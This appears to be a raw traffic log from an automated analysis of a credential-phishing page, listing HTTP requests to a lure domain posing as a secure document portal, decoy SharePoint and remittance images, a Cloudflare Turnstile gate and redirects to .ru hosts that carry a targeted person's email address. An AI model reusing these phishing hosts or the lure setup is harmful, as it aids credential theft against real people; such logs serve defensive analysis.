              Source: global trafficHTTP traffic detected: GET /?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20= HTTP/1.1Host: ossin7fot.pelosfilhos.com.brConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20= HTTP/1.1Host: docusecureonlineauthenticate.skapparelbd.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /Nh1JRsN/Share-Point.png HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://docusecureonlineauthenticate.skapparelbd.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/8/87/PDF_file_icon.svg/1200px-PDF_file_icon.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://docusecureonlineauthenticate.skapparelbd.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://docusecureonlineauthenticate.skapparelbd.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /G4TRWfJN/REMITTANCE-ADVICE-982636324-1.png HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://docusecureonlineauthenticate.skapparelbd.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://docusecureonlineauthenticate.skapparelbd.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /Nh1JRsN/Share-Point.png HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /wikipedia/commons/thumb/8/87/PDF_file_icon.svg/1200px-PDF_file_icon.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /G4TRWfJN/REMITTANCE-ADVICE-982636324-1.png HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7qi3r/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://docusecureonlineauthenticate.skapparelbd.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92602f271f80d96d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7qi3r/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7qi3r/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: docusecureonlineauthenticate.skapparelbd.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://docusecureonlineauthenticate.skapparelbd.com/site.php?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/865828961:1742920071:wsJzvxjBvnrTFNhFz4QcQWpLr23PjLoMwj1Z-LfI0n0/92602f271f80d96d/sd_h3PU4XBKOakP2gpVeyHPPiCVIwPT.IhX8USOHHVE-1742924330-1.1.1.1-a9tHj0RWV46cor58YN5ZBLC9MxI.9r6GAEoaVVG0mgtgDy.IDbfkgsjik1q7WZBS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/92602f271f80d96d/1742924331603/a06186267f9a53234bdaf93c3af884bff59bb9f410358683cc3d78775a83aad7/ySdFHeHnnWYx5FC HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7qi3r/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92602f271f80d96d/1742924331607/2zgn4H3QFtBhzg4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7qi3r/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92602f271f80d96d/1742924331607/2zgn4H3QFtBhzg4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/865828961:1742920071:wsJzvxjBvnrTFNhFz4QcQWpLr23PjLoMwj1Z-LfI0n0/92602f271f80d96d/sd_h3PU4XBKOakP2gpVeyHPPiCVIwPT.IhX8USOHHVE-1742924330-1.1.1.1-a9tHj0RWV46cor58YN5ZBLC9MxI.9r6GAEoaVVG0mgtgDy.IDbfkgsjik1q7WZBS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/865828961:1742920071:wsJzvxjBvnrTFNhFz4QcQWpLr23PjLoMwj1Z-LfI0n0/92602f271f80d96d/sd_h3PU4XBKOakP2gpVeyHPPiCVIwPT.IhX8USOHHVE-1742924330-1.1.1.1-a9tHj0RWV46cor58YN5ZBLC9MxI.9r6GAEoaVVG0mgtgDy.IDbfkgsjik1q7WZBS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /LrfdGrh7/?=Aangela.m.roell%40xcelenergy.com HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://docusecureonlineauthenticate.skapparelbd.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlBBNnUrNEowVFNjL2R4SEV4azVVdFE9PSIsInZhbHVlIjoiZXpmSFpieDNyNndtNkt3ZVU5TGRTZG1iSHlablpTTTJzMFlrNjk4VzZkZDJDQW01ZTk2bkJOek9ybVFtRjg2K1ZNNWZuL1dnR3dLYjlYQTFOazlQaWZTUitnd2s2ZTYyNDk5NUFtSEthSldmYnZFSkx1UCtjNWVOUjFLbVhzNkIiLCJtYWMiOiJmMjY4NjQ5N2FhYTIyZDZkYzRjMmYxOWM0MWEwZWUyYjE0MWM2ZDA1NTE0MjEwZjM1OGQ0Yzc5ODBiYWY4NzU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkgweGF2RXhlMDd0OTdNRDNXQjVObHc9PSIsInZhbHVlIjoiZDFoQlBybnppaVRBSW1FR2lUaG1la2hmU1JzdGlmeVdSUTFZSFkzTHJMd1FCK2F1bTNUdlhLKzZvNHd6Z1VaU01xanVYdTlpMmF0YVdEL3Zuc3o1U0tOTFNXSU1TMm8ya1RzeW9TT1d2UXF4QnozQ1E4RHV3U0IycDN0YXBLTTYiLCJtYWMiOiIxMzMzYTA0NGMzOGY4YjRkODZmNjA3NmI0ZDliM2YwYmUyNmNiYzhhYzNkZjEzYWI2MzA5YzMwMGI4NGNlNDc3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /jawari!xpna2 HTTP/1.1Host: xzes.kdyukk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://ldaqmiesa.fictiougbo.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jawari!xpna2 HTTP/1.1Host: xzes.kdyukk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /LrfdGrh7/?=Aangela.m.roell%40xcelenergy.com HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im11SlFDbjdqazZQVk56OExXSHg5dFE9PSIsInZhbHVlIjoiakhEWWs5MWtUNnNBOE5ERVQ0SGFGZEJ6OHFyUXZxb0hHS01QRW13YzlueStuam51aThYa2p3djhNWW80L2NjbWNEV2RVdmZ6WDREcEhqMWNSem5QTDA5dXR2Z0dyUkNMMkw4K1B1T0daYjloQXJRcUNsWFhLMUJ3V3VpU1JXZEwiLCJtYWMiOiIwYWYxZjYyYjA1MmYyYzI2NmZjZGI5N2MwN2U5MDk1OWJiYWE1NjdmNmY4YzNiZTVmMDZlODVmMGFiZDEzNjYxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5pZllpOE9yZjVFRm1xSnhsNTlZUFE9PSIsInZhbHVlIjoiTDVYOURLb29mcWZuRitMVmtDcFgxUU11b3BiRXVsc1h0M2xuTVgxUjV3ODM3eGVFQmZmV2U3UXRuVEhVVlVLczJOajgrQ3V1SWdydjJuK0ZjdXcycTZwMzVkVFJReE4xbWlzVEtudFJCTVMxbVB0NUtlM05SVkJUS3ZhU0UzNGYiLCJtYWMiOiIzNTEwM2M2MGNiMzk2NWQ3MmU5OWNjYzkyOTUyOGViNWRjNmQ3YzI2OGRhOGJjMmFkZjZmZTliODFmNGM4MzNiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /zuOxM8qSmFU00sOufqLd4sakvsYGyo HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im11SlFDbjdqazZQVk56OExXSHg5dFE9PSIsInZhbHVlIjoiakhEWWs5MWtUNnNBOE5ERVQ0SGFGZEJ6OHFyUXZxb0hHS01QRW13YzlueStuam51aThYa2p3djhNWW80L2NjbWNEV2RVdmZ6WDREcEhqMWNSem5QTDA5dXR2Z0dyUkNMMkw4K1B1T0daYjloQXJRcUNsWFhLMUJ3V3VpU1JXZEwiLCJtYWMiOiIwYWYxZjYyYjA1MmYyYzI2NmZjZGI5N2MwN2U5MDk1OWJiYWE1NjdmNmY4YzNiZTVmMDZlODVmMGFiZDEzNjYxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5pZllpOE9yZjVFRm1xSnhsNTlZUFE9PSIsInZhbHVlIjoiTDVYOURLb29mcWZuRitMVmtDcFgxUU11b3BiRXVsc1h0M2xuTVgxUjV3ODM3eGVFQmZmV2U3UXRuVEhVVlVLczJOajgrQ3V1SWdydjJuK0ZjdXcycTZwMzVkVFJReE4xbWlzVEtudFJCTVMxbVB0NUtlM05SVkJUS3ZhU0UzNGYiLCJtYWMiOiIzNTEwM2M2MGNiMzk2NWQ3MmU5OWNjYzkyOTUyOGViNWRjNmQ3YzI2OGRhOGJjMmFkZjZmZTliODFmNGM4MzNiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQ HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://ldaqmiesa.fictiougbo.ru/LrfdGrh7/?=Aangela.m.roell%40xcelenergy.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii9CVVkrdDdyZVlibjI5Y1YyRTRqRXc9PSIsInZhbHVlIjoidzBKa0F4WjdFQ1llOUJ5Qm8zemQ3T3daR2tjYjVuemVRY0xBSU11OTh1U2d6VkZlUStWWmU2RVQ3ckFVSnNXMWxzQlcxVFk3QVV0MFd4SlJCaVFQeDU3a2o2UEdmTjJZRGNEcUkwQlNHaUQrY2Q4ZlUyTkVMVVl6UVpqdU9INE8iLCJtYWMiOiIwODU5Y2Q3Yjk4NGFiZjdmMTA5ZTgzNjJkMDE4M2VhMDQxZTk2OTI2ZDg0ZTJmNTliNGM5NWYzZTZmN2MwMDc0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InpUc2lVKzBPbHpITGJBclBPQmg1elE9PSIsInZhbHVlIjoiWnBBTjJPT05xc1ArUGFBblhRZ210WHNlYm9INXFaUGExMTVuRi9CdzdJVlFMbHdzVEpQWlkrcHdoTG91SElkOHFYN2RxL1lOSDVlSngyYTVZbkthaElKVE1UVTI0dEJRNzM0WE9YbHd3NkxCa0lEcDBjdWdxaHpteENSbC9NbXgiLCJtYWMiOiJkNTdiOTU1ZDI5YTM2NzgxNzFiOWVkNmU5YjdmNWQ0NmRjMGY4Mzg1OWUxNGZmOTc0ZjhlOGY5Yjg4OTYyNDZiIiwidGFnIjoiIn0%3D
